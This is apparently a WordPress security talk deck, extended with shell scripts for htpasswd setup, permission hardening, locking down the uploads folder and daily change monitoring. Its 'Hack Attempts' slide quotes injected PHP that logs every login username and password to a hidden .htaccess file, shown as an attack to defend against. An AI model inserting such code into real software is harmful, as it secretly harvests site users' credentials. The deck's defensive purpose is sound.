Security
Tips & Tricks in securing your WordPress installation
About Me
• WordPress Plugins Developer
– Since 2003
– Created > 22 plugins
• wp-pagenavi, wp-polls, wp-postratings, wp-postviews, wp-dbmanager, etc
• http://profiles.wordpress.org/gamerz
• Tech Guy at Tech in Asia
– Joined on 1st September 2014
Lester Chan (@gamerz) [ 2 ]
WordPress Is Popular
• Powers 22% of the web
• Most blogs use WordPress
– Mashable.com
– Techcrunch.com
• Because it is popular, lots of attacks are being targeted at WordPress sites
Hack Attempts
• Credential-stealing code injected into wp-includes/users.php, which appends every username and password submitted at login to a file:
– $fh = fopen(ABSPATH . "core/wp-content/plugins/.htaccess","a+");
– fwrite($fh,$credentials['user_login'] . ':' . $credentials['user_password'] . "\n");
– fclose($fh);
• Backdoor files
Security 101
• Always keep WordPress & its plugins up to date.
• On 20th November 2014, WordPress 4.0.1 was released to fix:
– Three cross-site scripting issues that a contributor or author could use to compromise a site.
– A cross-site request forgery that could be used to trick a user into changing their password.
– An issue that could lead to a denial of service when passwords are checked.
– An extremely unlikely hash collision that could allow a user’s account to be compromised.
Passwords
• Use a complex password
– In general: not just for WordPress but for your cPanel/FTP as well
• Use a 2FA plugin
– Google Authenticator
• https://wordpress.org/plugins/google-authenticator/
– Authy Two Factor Authentication
• https://wordpress.org/plugins/authy-two-factor-authentication/
Passwords
• Protect your WP-Admin with a password
– Using htpasswd
• http://www.htaccesstools.com/htpasswd-generator/
– Placing this .htaccess in wp-admin:
ErrorDocument 401 default
AuthName "Lester Chan's Website WordPress Admin"
AuthUserFile "/home/gamerz/wp-admin/passwd"
AuthType Basic
require valid-user
<Files admin-ajax.php>
Order allow,deny
Allow from all
Satisfy any
</Files>
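A local way to create the htpasswd file and the wp-admin .htaccess shown above, so the password never has to be pasted into a third-party web generator. This is an added example, not from the deck; it assumes the openssl command-line tool is installed, and all paths are placeholders.

```shell
#!/bin/sh
# Added example: build the htpasswd file and wp-admin/.htaccess locally.
# Assumes the openssl CLI is available; all paths are placeholders.

# Append user:hash to an htpasswd file using Apache's apr1 (MD5) scheme.
# The password goes in on stdin rather than as an argument, so it does not
# show up in `ps`. Keep the file outside the web root, as the deck does.
add_htpasswd_user() {
  user="$1"; pass="$2"; file="$3"
  hash=$(printf '%s\n' "$pass" | openssl passwd -apr1 -stdin)
  printf '%s:%s\n' "$user" "$hash" >> "$file"
  chmod 600 "$file"
}

# Verify a password against the stored entry: re-hash with the stored salt
# (field 3 of $apr1$<salt>$<hash>) and compare. Returns 0 on a match.
check_htpasswd() {
  user="$1"; pass="$2"; file="$3"
  stored=$(grep "^$user:" "$file" | head -n 1 | cut -d: -f2-)
  [ -n "$stored" ] || return 1
  salt=$(printf '%s' "$stored" | cut -d'$' -f3)
  computed=$(printf '%s\n' "$pass" | openssl passwd -apr1 -salt "$salt" -stdin)
  [ "$computed" = "$stored" ]
}

# Write the deck's wp-admin/.htaccess, pointing at the htpasswd file.
# admin-ajax.php stays reachable because the public site calls it too.
write_admin_htaccess() {
  realm="$1"; passwd_file="$2"; wp_admin="$3"
  cat > "$wp_admin/.htaccess" <<EOF
ErrorDocument 401 default
AuthName "$realm"
AuthUserFile "$passwd_file"
AuthType Basic
require valid-user
<Files admin-ajax.php>
Order allow,deny
Allow from all
Satisfy any
</Files>
EOF
}

# Example wiring (placeholder paths):
# add_htpasswd_user gamerz 'a long passphrase' /home/gamerz/wp-admin/passwd
# write_admin_htaccess "WordPress Admin" /home/gamerz/wp-admin/passwd /home/gamerz/public_html/wp-admin
```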
HTTPS
• HTTPS encrypts communication and sensitive data between the browser and wp-admin.
• Prevents man-in-the-middle attacks.
• In wp-config.php:
– define('FORCE_SSL_LOGIN', true);
– define('FORCE_SSL_ADMIN', true);
• FORCE_SSL_LOGIN has been deprecated since WordPress 4.0; FORCE_SSL_ADMIN on its own forces both the login page and the admin area over HTTPS.
Files/Folder Permissions
• Files & folders should be readable & writeable only by the owner, and readable by everyone else
• Ensure all files are CHMOD to 644
– find . -type f -exec chmod 644 {} \;
• Ensure all folders are CHMOD to 755
– find . -type d -exec chmod 755 {} \;
WordPress Uploads
• /wp-content/uploads/
– Is a common attack vector because it stores user-uploaded files
– Harder to notice
– Most people will just CHMOD this to 777
• Which means everyone can read & write to it
– This folder should only serve static assets & not execute any scripts
• http://stackoverflow.com/questions/18932756/disable-all-cgi-php-perl-for-a-directory-using-htaccess
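The permissions slide and the uploads slide as one added script (not from the deck): it applies the 644/755 rules, drops an .htaccess into wp-content/uploads that refuses to execute scripts, and reports anything that drifts so it can be run from cron. The extension list in FilesMatch is my own choice, and the directives use the Apache 2.2 Order/Deny style that the wp-admin slide already uses.

```shell
#!/bin/sh
# Added example: harden a WordPress tree's permissions and its uploads folder.
# Usage: harden_wp_tree /path/to/wordpress

# The deck's CHMOD rules: files 644, directories 755.
set_wp_perms() {
  find "$1" -type f -exec chmod 644 {} \;
  find "$1" -type d -exec chmod 755 {} \;
}

# Make wp-content/uploads serve static assets only. Apache 2.2 syntax,
# matching the Order/Allow directives used in the wp-admin slide.
# The extension list is a reasonable default, not the deck's.
protect_uploads() {
  uploads="$1/wp-content/uploads"
  mkdir -p "$uploads"
  cat > "$uploads/.htaccess" <<'EOF'
# Never execute anything that was uploaded here.
<FilesMatch "\.(php|phtml|php[3-7]|phar|pl|py|cgi|sh)$">
    Order deny,allow
    Deny from all
</FilesMatch>
EOF
  chmod 644 "$uploads/.htaccess"
}

# List files not 644 and directories not 755 (this catches the 777 uploads
# folder the deck warns about). Returns 1 if anything was found, so a cron
# job can mail the output only when something has drifted.
check_wp_perms() {
  bad=$( { find "$1" -type f ! -perm 644; find "$1" -type d ! -perm 755; } )
  [ -z "$bad" ] && return 0
  printf '%s\n' "$bad"
  return 1
}

harden_wp_tree() {
  protect_uploads "$1"
  set_wp_perms "$1"
  check_wp_perms "$1"
}
```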
Monitor Changed Files
• I monitor my site's changed files via email on a daily basis
• Using CRON
– find /home/gamerz/public_html -mtime -1
Using Git
• /core/
– Contains a Git checkout of https://github.com/WordPress/WordPress
– git fetch --tags; git checkout 4.0.1
• /content/
– It is a Git checkout of my private repository
– Contains all my active plugins and themes
• Doing a git status on any folder above will also tell me what has changed
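An added daily report script, not from the deck, that serves both the "Monitor Changed Files" slide and the Git slide: it keeps the `find -mtime -1` listing, adds a sha256 manifest so a file whose mtime was reset still shows up, and prints `git status` for the two checkouts. It assumes GNU coreutils (sha256sum), that the core and content checkouts sit under the web root, and that the manifest lives outside the web root; paths and the mail address are placeholders.

```shell
#!/bin/sh
# Added example: daily change report for a WordPress tree.
# Assumes GNU coreutils (sha256sum) and a manifest stored outside the web root.

# Files modified in the last 24 hours, exactly as the deck's cron job does.
recently_modified() {
  find "$1" -type f -mtime -1
}

# Record the sha256 of every file under the web root. Rebuild after each
# deliberate change (upgrade, plugin install); keep it outside the web root.
build_manifest() {
  find "$1" -type f -exec sha256sum {} + | sort -k2 > "$2"
}

# Compare the tree against the manifest. Prints CHANGED/ADDED/REMOVED <path>
# and returns 1 if anything differs (paths are assumed to contain no spaces).
compare_manifest() {
  now=$(mktemp)
  find "$1" -type f -exec sha256sum {} + | sort -k2 > "$now"
  report=$(diff "$2" "$now" | awk '
    /^</ { before[$3] = $2 }
    /^>/ { after[$3] = $2 }
    END {
      for (p in before) { if (p in after) print "CHANGED " p; else print "REMOVED " p }
      for (p in after) { if (!(p in before)) print "ADDED " p }
    }')
  rm -f "$now"
  [ -z "$report" ] && return 0
  printf '%s\n' "$report"
  return 1
}

# Git-managed directories (the deck's /core/ and /content/): every line
# printed here is a modified, added or untracked file.
git_drift() {
  git -C "$1" status --porcelain --untracked-files=all
}

# Run daily from cron and mail the output (placeholder paths and address):
# 0 6 * * * sh -c '. /home/gamerz/wp-report.sh; daily_report /home/gamerz/public_html /home/gamerz/.wp-manifest' | mail -s "WP changes" you@example.com
daily_report() {
  echo "== modified in last 24h =="; recently_modified "$1"
  echo "== manifest differences =="; compare_manifest "$1" "$2" || true
  for d in "$1/core" "$1/content"; do
    [ -d "$d/.git" ] && { echo "== git status $d =="; git_drift "$d"; }
  done
  return 0
}
```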
Backup
• Backup your database regularly
– Every hour if you blog more than once a day
– Every day if you blog regularly
– Using a plugin like WP-DBManager
• https://wordpress.org/plugins/wp-dbmanager/
• Backup your /uploads/ folder
– Using Git? (not ideal)
– FTP to S3/Dropbox?
– NAS
– Gluster FS
VaultPress
• https://vaultpress.com/
– By Automattic
• Company behind WordPress.com
– Paid
• Lite (USD$55/year), Basic (USD$165/year), Premium (USD$440/year)
– Features
• Realtime full (database + files) backup
• Scanning your site for dangerous files
• Automatic restore of database + files
WordFence
• http://www.wordfence.com/
• By Feedjit Inc
– Paid
• USD$39/year
– Features
• Cellphone Sign-in
• Network & Geo Blocking
• Site Repair
• Machine Learning
• Source Code Verification
Summary
• Password-protected WP-Admin
• Use Google Authenticator as 2FA login for WordPress
• HTTPS for WP-Admin
• Ensure all files are CHMOD to 644 and folders to 755
• Do not allow any script execution in the /uploads/ folder
• Monitor your site's changed files
• Backup your database regularly
Other References
• http://codex.wordpress.org/Hardening_WordPress
• http://codex.wordpress.org/Backing_Up_Your_WordPress_Files
• http://wordpress.tv/tag/security/
Questions?
• Any questions?
• You can also find me at
– Blog: http://lesterchan.net
– Twitter: @gamerz
– Facebook: https://fb.com/lesterchan
– Instagram: @gamerz